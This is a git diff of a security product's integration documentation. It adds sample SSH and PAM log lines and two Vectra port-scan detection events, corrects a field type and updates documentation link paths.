@@ -44,6 +44,30 @@ In this section, you will find examples of raw logs as generated natively by the +=== "accepted_rsa" + + ``` + Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /home/star/.ssh/authorized_keys:2 + ``` + + + +=== "accepted_rsa_2" + + ``` + Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /usr/local/nagios/.ssh/authorized_keys:1 + ``` + + + +=== "auth_method_disabled" + + ``` + main: sshd: ssh-rsa algorithm is disabled + ``` + + + === "authentication_attempts_exceeded" ``` @@ -84,6 +108,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "connection_closed_2" + + ``` + Connection closed by 127.0.0.1 + ``` + + + === "connection_closed_authenticating_user" ``` @@ -124,6 +156,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "connection_from" + + ``` + Connection from 127.0.0.1 port 58752 on 127.0.0.1 port 22 + ``` + + + === "connection_reset" ``` @@ -276,6 +316,30 @@ In this section, you will find examples of raw logs as generated natively by the +=== "pam_faillock_consecutive_failures" + + ``` + pam_faillock(sshd:auth): Consecutive login failures for user JDOE account temporarily locked + ``` + + + +=== "pam_faillock_user_unknown" + + ``` + pam_faillock(sshd:auth): User unknown + ``` + + + +=== "pam_faulty_module" + + ``` + PAM adding faulty module: pam_cracklib.so + ``` + + + === "pam_more_auth_failure" ``` @@ -300,6 +364,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "pam_session_failed_to_create" + + ``` + pam_systemd(sshd:session): Failed to create session: Maximum number of sessions (8192) reached, refusing further sessions. + ``` + + + === "pam_session_opened" ``` 
@@ -316,6 +388,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "pam_unable_to_dlopen" + + ``` + PAM unable to dlopen(pam_cracklib.so): /lib/security/pam_cracklib.so: cannot open shared object file: No such file or directory + ``` + + + === "pam_winbind_granted_access" ``` @@ -324,6 +404,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "postponed_publickey" + + ``` + Postponed publickey for star from 127.0.0.1 port 44690 ssh2 [preauth] + ``` + + + === "received_disconnect_bye_bye" ``` @@ -356,7 +444,31 @@ In this section, you will find examples of raw logs as generated natively by the -=== "unable_to_negociate" +=== "received_disconnect_user_2" + + ``` + Received disconnect from 127.0.0.1: 11: disconnected by user + ``` + + + +=== "starting_session" + + ``` + Starting session: command for nagios from 127.0.0.1 port 58752 id 0 + ``` + + + +=== "starting_session_2" + + ``` + Starting session: command for star from 127.0.0.1 port 44690 id 0 + ``` + + + +=== "unable_to_negotiate" ``` Unable to negotiate with 1.2.3.4 port 27824: no matching cipher found. Their offer: aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none [preauth] @@ -364,6 +476,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "unable_to_negotiate_2" + + ``` + Unable to negotiate with 1.2.3.4 port 5228: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth] + ``` + + + === "user_not_allowed" ``` @@ -372,3 +492,11 @@ In this section, you will find examples of raw logs as generated natively by the +=== "user_on_pid" + + ``` + User child is on pid 60225 + ``` + + + 
diff --git a/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md b/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md index e128be21ea..56e7e664d0 100644 --- a/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md +++ b/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "AgentAntiMalware.json" diff --git a/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md b/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md index 587f43f299..911bd6eb9e 100644 
--- a/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md +++ b/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "epo_event.json" diff --git a/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md b/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md index fe21fa6cfe..43afe36c68 100644 --- a/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md +++ b/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "domain_match.json" diff --git a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md index 6c5e7e030d..d7d6f946f7 100644 --- a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md +++ b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "malcore_event.json" diff --git a/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md b/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md index 2fd79e60c9..45a6615bb6 100644 --- a/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md +++ b/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "dns_type_1.json" diff --git a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md index 62620dd4bf..8a7c6bfc2e 100644 --- a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md +++ b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md 
@@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "vectra_account_scoring.json" 
@@ -508,6 +508,114 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "vectra_several_ports_scanned_01.json" + + ```json + + { + "message": "-: {\"ports\": \"7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157\", \"scans\": 100, \"successes\": 0, \"version\": \"8.5\", \"detection_id\": 85003, \"category\": \"RECONNAISSANCE\", \"severity\": 0, \"threat\": 0, \"certainty\": 0, \"d_type\": \"port_scan\", \"d_type_vname\": \"Port Scan\", \"triaged\": true, \"headend_addr\": \"1.2.3.4\", \"dvchost\": \"1.2.3.4\", \"href\": \"https://1.2.3.4/detections/85003?detail_id=2029813\", \"dd_dst_ip\": \"5.6.7.8\", \"dd_dst_port\": 0, \"dd_dst_dns\": \"\", \"dd_bytes_sent\": 0, \"dd_bytes_rcvd\": 0, \"mitre\": [\"T1046\", \"T1018\", \"T1072\"], \"host_name\": \"host\", \"host_ip\": \"3.4.5.6\", \"dd_proto\": \"tcp\", \"vectra_timestamp\": \"1721184242\"}", + "event": { + "action": "RECONNAISSANCE", + "url": "https://1.2.3.4/detections/85003?detail_id=2029813" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 0 + }, + "host": { + "ip": "3.4.5.6", + "name": "host" + }, + "network": { + "protocol": "tcp" + }, + "observer": { + "ip": "1.2.3.4", + "name": "1.2.3.4", + "version": "8.5" + }, + "related": { + "ip": [ + "1.2.3.4", + "3.4.5.6", + "5.6.7.8" + ] + }, + "vectra": { + "certainty": 0, + "detection": { + "id": 85003, + "name": "Port Scan", + "ports": 
"7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", + "scans": "100", + "successes": "0", + "type": "port_scan" + }, + "risk_score_norm": 0, + "severity": 0, + "timestamp": 1721184242, + "triaged": true + } + } + + ``` + + +=== "vectra_several_ports_scanned_02.json" + + ```json + + { + "message": "-: {\"ports\": \"7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157\", \"scans\": 100, \"successes\": 0, \"version\": \"8.5\", \"detection_id\": 85003, \"category\": \"RECONNAISSANCE\", \"severity\": 0, \"threat\": 0, \"certainty\": 0, \"d_type\": \"port_scan\", \"d_type_vname\": \"Port Scan\", \"triaged\": true, \"headend_addr\": \"1.2.3.4\", \"dvchost\": \"1.2.3.4\", \"href\": \"https://1.2.3.4/detections/85003?detail_id=2029784\", \"dd_dst_ip\": \"5.6.7.8\", \"dd_dst_port\": 0, \"dd_dst_dns\": \"\", \"dd_bytes_sent\": 0, \"dd_bytes_rcvd\": 0, \"mitre\": [\"T1046\", \"T1018\", \"T1072\"], \"host_name\": \"host\", \"host_ip\": \"3.4.5.6\", \"dd_proto\": \"tcp\", \"vectra_timestamp\": \"1721183706\"}", + "event": { + "action": "RECONNAISSANCE", + "url": "https://1.2.3.4/detections/85003?detail_id=2029784" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 0 + }, + "host": { + "ip": "3.4.5.6", + "name": "host" + }, + "network": { + "protocol": "tcp" + }, + "observer": { + "ip": "1.2.3.4", + "name": 
"1.2.3.4", + "version": "8.5" + }, + "related": { + "ip": [ + "1.2.3.4", + "3.4.5.6", + "5.6.7.8" + ] + }, + "vectra": { + "certainty": 0, + "detection": { + "id": 85003, + "name": "Port Scan", + "ports": "7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", + "scans": "100", + "successes": "0", + "type": "port_scan" + }, + "risk_score_norm": 0, + "severity": 0, + "timestamp": 1721183706, + "triaged": true + } + } + + ``` + + === "vectra_threat1.json" ```json @@ -1938,7 +2046,7 @@ The following table lists the fields that are extracted, normalized under the EC |`vectra.detection.normal_servers` | `keyword` | The normal servers observed. | |`vectra.detection.num_attempts` | `keyword` | The number of attempts | |`vectra.detection.port` | `keyword` | The external port used. | -|`vectra.detection.ports` | `long` | Ports scanned. | +|`vectra.detection.ports` | `keyword` | Ports scanned. | |`vectra.detection.product_id` | `keyword` | The unusual product ID. | |`vectra.detection.profile` | `object` | The detection profile associated with this host. | |`vectra.detection.protocol` | `keyword` | The external protocol used. | diff --git a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md index 9ad66cb42f..ace7de536e 100644 --- a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md +++ b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md 
@@ -68,6 +68,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "vectra_several_ports_scanned_01" + + ``` + -: {"ports": "7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", "scans": 100, "successes": 0, "version": "8.5", "detection_id": 85003, "category": "RECONNAISSANCE", "severity": 0, "threat": 0, "certainty": 0, "d_type": "port_scan", "d_type_vname": "Port Scan", "triaged": true, "headend_addr": "1.2.3.4", "dvchost": "1.2.3.4", "href": "https://1.2.3.4/detections/85003?detail_id=2029813", "dd_dst_ip": "5.6.7.8", "dd_dst_port": 0, "dd_dst_dns": "", "dd_bytes_sent": 0, "dd_bytes_rcvd": 0, "mitre": ["T1046", "T1018", "T1072"], "host_name": "host", "host_ip": "3.4.5.6", "dd_proto": "tcp", "vectra_timestamp": "1721184242"} + ``` + + + +=== "vectra_several_ports_scanned_02" + + ``` + -: {"ports": "7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", "scans": 100, "successes": 0, "version": "8.5", "detection_id": 85003, "category": "RECONNAISSANCE", "severity": 0, "threat": 0, "certainty": 0, "d_type": "port_scan", "d_type_vname": "Port Scan", "triaged": true, "headend_addr": "1.2.3.4", "dvchost": "1.2.3.4", "href": "https://1.2.3.4/detections/85003?detail_id=2029784", "dd_dst_ip": "5.6.7.8", "dd_dst_port": 0, "dd_dst_dns": "", "dd_bytes_sent": 0, "dd_bytes_rcvd": 0, "mitre": 
["T1046", "T1018", "T1072"], "host_name": "host", "host_ip": "3.4.5.6", "dd_proto": "tcp", "vectra_timestamp": "1721183706"} + ``` + + + === "vectra_threat1" ``` diff --git a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md index b2c114378d..be558f7f25 100644 --- a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md +++ b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md @@ -37,7 +37,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth.json" 
diff --git a/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md b/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md index e03ecd7455..f0754f5641 100644 --- a/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md +++ b/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ActorType1.json" diff --git a/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md b/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md index df3bc1f686..ad634bd338 100644 --- a/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md 
+++ b/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_corp_audit_log_1.json" diff --git a/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md b/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md index af82354abb..5cff811124 100644 --- a/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md +++ b/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "accept.json" diff --git a/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md b/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md index ff916683d3..79d5d445b9 100644 --- a/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md +++ b/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_1.json" diff --git a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md index 9d3ce3780d..6d653bb9f6 100644 --- a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md +++ b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md 
@@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ad.json" 
@@ -121,7 +121,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-08-22T13:51:38\",\"Id\":\"3e4f9ff8\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"12b674a1\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"5bd75e5d\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"1.2.3.4\",\"ObjectId\":\"16aeb910\",\"UserId\":\"jone.doe@user.fr\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\":[{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Token\"}],\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"5bd75e5d\",\"Type\":0},{\"ID\":\"joe.doe@user.fr\",\"Type\":5}],\"ActorContextId\":\"12b674a1\",\"ActorIpAddress\":\"1.2.3.4\",\"InterSystemsId\":\"d8254b84\",\"IntraSystemId\":\"3e4f9ff8\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"16aeb910\",\"Type\":0}],\"TargetContextId\":\"12b674a1\",\"ApplicationId\":\"1b3c667f\",\"DeviceProperties\":[{\"Name\":\"OS\",\"Value\":\"Windows10\"},{\"Name\":\"BrowserType\",\"Value\":\"Edge\"},{\"Name\":\"IsCompliantAndManaged\",\"Value\":\"False\"},{\"Name\":\"SessionId\",\"Value\":\"8e2cdebf\"}],\"ErrorNumber\":\"0\"}", + "message": "{\"CreationTime\": \"2023-08-22T13:51:38\", \"Id\": \"3e4f9ff8\", \"Operation\": \"UserLoggedIn\", \"OrganizationId\": \"12b674a1\", \"RecordType\": 15, \"ResultStatus\": \"Success\", \"UserKey\": \"5bd75e5d\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ClientIP\": \"1.2.3.4\", \"ObjectId\": \"16aeb910\", \"UserId\": \"jone.doe@user.fr\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"ResultStatusDetail\", \"Value\": \"Success\"}, {\"Name\": \"UserAgent\", \"Value\": \"Mozilla/5.0\"}, {\"Name\": \"RequestType\", \"Value\": \"OAuth2:Token\"}], \"ModifiedProperties\": [], \"Actor\": [{\"ID\": \"5bd75e5d\", 
\"Type\": 0}, {\"ID\": \"joe.doe@user.fr\", \"Type\": 5}], \"ActorContextId\": \"12b674a1\", \"ActorIpAddress\": \"1.2.3.4\", \"InterSystemsId\": \"d8254b84\", \"IntraSystemId\": \"3e4f9ff8\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"16aeb910\", \"Type\": 0}], \"TargetContextId\": \"12b674a1\", \"ApplicationId\": \"1b3c667f\", \"DeviceProperties\": [{\"Name\": \"OS\", \"Value\": \"Windows10\"}, {\"Name\": \"BrowserType\", \"Value\": \"Edge\"}, {\"Name\": \"IsCompliantAndManaged\", \"Value\": \"False\"}, {\"Name\": \"SessionId\", \"Value\": \"8e2cdebf\"}], \"ErrorNumber\": \"0\"}", "event": { "action": "UserLoggedIn", "category": [ 
